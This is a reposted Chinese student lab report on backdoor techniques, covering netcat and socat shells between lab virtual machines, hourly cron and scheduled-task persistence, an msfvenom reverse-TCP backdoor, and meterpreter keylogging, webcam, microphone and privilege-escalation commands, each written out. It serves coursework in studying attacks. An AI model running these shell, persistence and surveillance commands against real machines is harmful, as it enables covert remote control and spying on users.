20155313 杨瀚 《网络对抗技术》实验二 后门原理与实践

Exp2 后门原理与实践

一、实验内容

  • 1.使用netcat获取主机操作Shell,cron启动 (0.5分)

  • 2.使用socat获取主机操作Shell, 任务计划启动 (0.5分)

  • 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

  • 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

  • 5.可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

二、实验过程

第一阶段

  • 1.首先我们将从码云上下载的necat压缩包拷入win7的虚拟机中,同时也把rar的安装包拷进去用来解压缩necat。然后将necat解压缩在桌面,做好准备工作。

  • 2.接着我们打开cmd通过ipconfig查看win7的IP地址,同时也使用ifconfig在kali虚拟机中查看IP地址。
    1071530-20180329204150736-673156419.png
    1071530-20180329204247091-84655184.png

  • 3.然后我们在win7上的ncat目录中启用necat的指令ncat.exe -l -p 5313打开本地的监听端口,让kali傻乎乎地通过nc 172.20.10.7 5313 -e /bin/sh连进来,然后获得kali的操作shell。
    1071530-20180329204234302-1932802834.png
    1071530-20180329204227577-840772173.png

  • 4.当然kali也不傻,也可以通过打开监听端口nc -l -p 5313让win7傻乎乎地连进来,然后获取对方的操作shell。(所以说这是一个谁傻乎乎谁被操控的操作?)
    1071530-20180329204257272-1577660675.png
    1071530-20180329204301979-1018864501.png

  • 5.同时kali和win7也可以通过necat这个指令进行文字传输,所以这也是之后的后门程序传输的通道。(所以不要随便和小姐姐聊天不然说不定你就被传后门了)
    1071530-20180329204339638-712158220.png
    1071530-20180329204342228-2092192899.png

  • 6.接下来我们要通过crontab这个指令进行周期性即定时的执行我们刚才所做的傻乎乎操作。我们通过man crontab查看crontab的使用指南,然后看了一圈看不懂就去百度最后了解了它的用法。
    1071530-20180329204350131-522595669.png

  • 7.我们使用crontab指令的-e参数,即edit(编辑)来修改我们需要它周期性执行的时间。通过在最后一行添加1 * * * * /bin/netcat 172.20.10.7 5313 -e /bin/sh,我把时间改成1,即每小时的01分钟的时候,kali会定期傻乎乎地连接win7的5313端口,然后被人家获取操作shell。
    1071530-20180329204402629-1353943461.png
    1071530-20180329204411004-1491490010.png

第二阶段:

  • 1.傻乎乎完毕了以后我们开始使用socat这个比necat更高级的传输指令。同样先将socat压缩包拷入解压缩。

  • 2.socat高级的其中之一的原因就是它可以通过触发器来运行,即我们可以将它填入进程的触发脚本中,我们在某一项操作过后它可以自动触发运行。我们通过以下的设置,将它设置为打开锁定win7的时候进行触发,其中在脚本一栏选择我们刚才解压缩的socat.exe可执行文件,在参数一栏填入tcp-listen:5313 exec:cmd.exe,pty,stderr。当我们通过打开休眠的计算机的时候它就启动了。
    1071530-20180329204623899-553848278.png
    1071530-20180329204626460-1789445861.png
    1071530-20180329204632384-891300389.png
    1071530-20180329204931070-721828130.png

  • 3.在kali端我们使用socat - tcp:172.20.10.7:5313就可以在每个小时的01分钟的时候获取win7的cmd shell。(开始高端起来了)
    1071530-20180329204953300-298056163.png

第三阶段:

  • 1.首先我们使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.6 LPORT=5313 -f exe > 20155313_backdoor.exe指令生成一个主机地址为172.20.10.6,端口号为5313的后门程序。
    1071530-20180329205005076-1973112718.png

  • 2.通过之前的necat传输(就是刚才聊天的那个命令),将这个后门程序传输到win7上。
    1071530-20180329205013011-1930756923.png
    1071530-20180329205015713-512227477.png

  • 3.在kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口。设置完成以后就可以开始进行监听。
    1071530-20180329205035982-54530634.png
    1071530-20180329205049961-822067924.png
    1071530-20180329205055153-38067695.png

  • 4.这时候win7的用户有意无意的打开了刚才传送来的后门程序,此时的kali上已经获得了win7主机的连接,且获得了远程控制的shell(不只是刚才的cmd shell)。
    1071530-20180329205104451-1430292212.png
    1071530-20180329205112566-1510545088.png

  • 5.此时我们可以通过record_mic指令来获得win7端的音频;可以通过webcam_snap来获得摄像头拍的照片;可以通过webcam stream来进行录制视频;可以通过screenshot来获得win7端的截屏;可以通过keyscan_start指令开始记录下击键的过程,然后再使用keyscan_dump指令读取击键的记录;甚至可以使用getuid指令查看当前用户,并且使用getsystem指令提升远程控制的权限!
    1071530-20180329205118681-148326483.png
    1071530-20180329205125267-1645206713.png
    1071530-20180329210243713-632350903.png

实验中出现的问题:

  • 1.我们在进行提权操作的时候出现以下的问题:命名管道模拟?
    1071530-20180329205530073-873140568.png

  • 2.参考网上查阅到的解决方案,我们选择绕过UAC,再进行一次msf控制台的设置,然后在进入监听模式。然而结果令人大失所望,连监听模式都进不去了,显示错误是:没有建立会话?
    1071530-20180329205838986-1596177048.png

  • 3.带着烦躁的心情,我们重新观察一下之前background的返回参数,看到了session好像是5?于是将之前的session 1改成了session 5。带着不平静的心情我们尝试进入监听模式,结果...............................成功了!一鼓作气再尝试提升远程控制端权限,结果...............................又成功了!!!最终实验圆满完成!
    1071530-20180329210232061-7598418.png

三、思考题

  • 1.例举你能想到的一个后门进入到你系统中的可能方式?

  • 2.例举你知道的后门如何启动起来(win及linux)的方式?

  • 3.Meterpreter有哪些给你映像深刻的功能?

  • 4.如何发现自己有系统有没有被安装后门?

四、实验体会

参考资料

Metasploit Run VNC on Win7/2008

转载于:https://www.cnblogs.com/bonsai/p/8672288.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值